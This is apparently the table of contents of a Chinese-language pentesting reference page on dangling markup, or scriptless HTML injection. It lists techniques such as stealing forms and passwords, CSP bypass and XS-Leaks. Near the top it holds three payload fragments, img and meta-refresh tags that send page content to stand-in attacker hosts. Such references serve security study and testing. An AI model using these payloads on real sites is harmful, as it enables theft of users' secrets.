Dangling Markup - HTML scriptless injection
简介
主要应用
窃取明文秘密
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=窃取表单
窃取表单 2
窃取表单 3
窃取明文密码 2
表单参数注入
通过noscript窃取明文密码
通过用户交互绕过 CSP
误导性脚本工作流 1 - HTML 命名空间攻击
误导性脚本工作流 2 - 脚本命名空间攻击
滥用 JSONP
Iframe 滥用
<meta 滥用
新的 <portal HTML 标签
HTML泄漏
SS泄漏
SS-LeaksXS-Search/XS-Leaks
XS-Search/XS-Leaks暴力检测列表
参考资料
最后更新于